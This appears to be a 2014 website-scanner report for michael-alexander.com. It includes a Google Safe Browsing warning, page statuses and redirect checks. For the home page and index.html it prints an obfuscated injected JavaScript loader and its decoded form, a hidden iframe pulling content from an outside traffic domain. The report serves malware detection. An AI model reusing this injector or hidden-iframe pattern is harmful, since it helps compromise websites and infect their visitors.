Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=michael-alexander.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://michael-alexander.com/ | 200 OK Content-Length: 11064 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function c32aee72b6q49ce542d43cbc(q49ce542d4448b){ function q49ce542d44c5a(){return 16;} return (eval('pa'+'rseInt')(q49ce542d4448b,q49ce542d44c5a()));}function q49ce542d45bfc(q49ce542d463ca){ var q49ce542d46b98='';q49ce542d48ad7=String['fromCharCode'];for(q49ce542d47368=0;q49ce542d47368<q49ce542d463ca.length;q49ce542d47368+=2){ q49ce542d46b98+=(q49ce542d48ad7(c32aee72b6q49ce542d43cbc(q49ce542d463ca.substr(q49ce542d47368,2))));}return q49ce542d46 ...[1620 bytes skipped]... Decoded script: <iframe name=c32 src='http://clarafin.info/traff/index.php?'+Math.round(Math.random()*252840)+'0ead' width=645 height=392 style='visibility:hidden'></iframe> Antivirus reports:
Hidden iFrame found. size: 1x1 style: hidden src: http://url/ <iframe src='http://url/' width='1' height='1' style='visibility: hidden;'> | ||
http://michael-alexander.com/index.html | 200 OK Content-Length: 11064 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function c32aee72b6q49ce542d43cbc(q49ce542d4448b){ function q49ce542d44c5a(){return 16;} return (eval('pa'+'rseInt')(q49ce542d4448b,q49ce542d44c5a()));}function q49ce542d45bfc(q49ce542d463ca){ var q49ce542d46b98='';q49ce542d48ad7=String['fromCharCode'];for(q49ce542d47368=0;q49ce542d47368<q49ce542d463ca.length;q49ce542d47368+=2){ q49ce542d46b98+=(q49ce542d48ad7(c32aee72b6q49ce542d43cbc(q49ce542d463ca.substr(q49ce542d47368,2))));}return q49ce542d46 ...[1620 bytes skipped]... Decoded script: <iframe name=c32 src='http://clarafin.info/traff/index.php?'+Math.round(Math.random()*252840)+'0ead' width=645 height=392 style='visibility:hidden'></iframe> Antivirus reports:
Hidden iFrame found. size: 1x1 style: hidden src: http://url/ <iframe src='http://url/' width='1' height='1' style='visibility: hidden;'> | ||
http://michael-alexander.com/dnp-pr.html | 404 Not Found Content-Length: 293 Content-Type: text/html | clean |
http://michael-alexander.com/test404page.js | 404 Not Found Content-Length: 296 Content-Type: text/html | clean |
http://michael-alexander.com/dnp-web.html | 404 Not Found Content-Length: 294 Content-Type: text/html | clean |
http://michael-alexander.com/dnp-clients.html | 404 Not Found Content-Length: 298 Content-Type: text/html | clean |
http://michael-alexander.com/dnp-about.html | 404 Not Found Content-Length: 296 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: michael-alexander.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 07 Jun 2014 21:24:08 GMT
Accept-Ranges: bytes
ETag: "2b38-466710e3c19c0"
Server: Apache/2.4.9 (Unix)
Content-Length: 11064
Content-Type: text/html
Last-Modified: Tue, 31 Mar 2009 21:41:03 GMT
...11064 bytes of data.
GET / HTTP/1.1
Host: michael-alexander.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 07 Jun 2014 21:24:08 GMT
Accept-Ranges: bytes
ETag: "2b38-466710e3c19c0"
Server: Apache/2.4.9 (Unix)
Content-Length: 11064
Content-Type: text/html
Last-Modified: Tue, 31 Mar 2009 21:41:03 GMT
...11064 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: michael-alexander.com
Referer: http://www.google.com/search?q=michael-alexander.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: michael-alexander.com
Referer: http://www.google.com/search?q=michael-alexander.com
Result:
The result is similar to the first query. There are no suspicious redirects found.